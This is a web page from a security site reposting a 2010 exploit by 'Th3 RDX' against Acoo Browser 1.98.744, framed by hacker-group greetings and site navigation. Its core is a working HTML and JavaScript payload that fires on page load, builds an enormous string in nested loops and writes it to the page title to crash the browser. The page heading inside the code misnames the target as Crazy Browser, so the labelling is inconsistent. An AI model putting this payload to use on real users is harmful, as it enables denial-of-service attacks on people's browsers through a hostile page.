首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Acoo Browser 1.98.744 Denial of Service Exploit
来源:vfocus.net 作者:Th3 RDX 发布时间:2010-06-30  
# Exploit Title: Acoo Browser 1.98.744 Denial of Service Exploit
# Date: 29-06-2010
# Author: Th3 RDX
# Software Link:
# Version: 1.98.744
# Tested on: Windows XP Service Pack 1/2/3
# category: Windows
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky,
r0073r(inj3ct0r.com), Nishi (br0wn_sug4r)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   RooT Bro waiting for u to come online desperately and missing you alot
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

        Th3 RDX

----- [ E - mail ] -----

    th3rdx@gmail.com


                                                        %\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Acoo Browser 1.98.744 Denial of Service Exploit

----- [ Vendor ] -----

http://www.acoobrowser.com/

----- [ Tested On ] -----

Windows XP Service Pack 1/2/3

                                                        %\\
##############################################################################

##############################################################################
%//

----- [ c0de ] -----

<html>
<head>
<title>Acoo Browser 1.98.744 Denial of Service Exploit | By: Th3
RDX</title>
<body bgcolor="black">

<script type="text/javascript">
function RDX() {
    var buffer = "";
    for (var i = 0; i < 6000; i++) {
        buffer += "%4a%61%69%20%53%61%69%20%4e%61%74%68";
    }
    var buffer2 = buffer;
    for (i = 0; i < 6000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>

<body onload="javascript:RDX();">
</head>
<body>
<center>
<h1>
<strong>
<font color="white">
| Crazy Browser v3.0.5 Remote Denial of Service Exploit |
<br><br><br>
 By: Th3 RDX
</font>
</strong>
</h1>
</body>
</html>

                                                        %\\
##############################################################################


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Thanks To All: www.Exploit-db.com | Inj3ct0r Team | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PROUD TO BE AN INDIAN

c0d3 for motherland, h4ck for motherland

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.

Bug discovered : 29 June 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#End 0Day#



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TheWorld Browser 3.1.6.8 DOS E
·Opera 10.54 Denial of Service
·Linux/ARM chmod("/etc/shadow",
·Netscape Browser 9.x Denial of
·Polymorphic /bin/sh x86 linux
·Internet Browser Classic (IBC
·Linux/ARM - setuid(0) & kill(-
·FineBrowser v.3.2 Denial of Se
·Linux/ARM - setuid(0) & execve
·GSM SIM Utility sms file Local
·Mozilla Firefox 3.6.6 Denial o
·Lunascape Browser 6.1.6 Denial
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved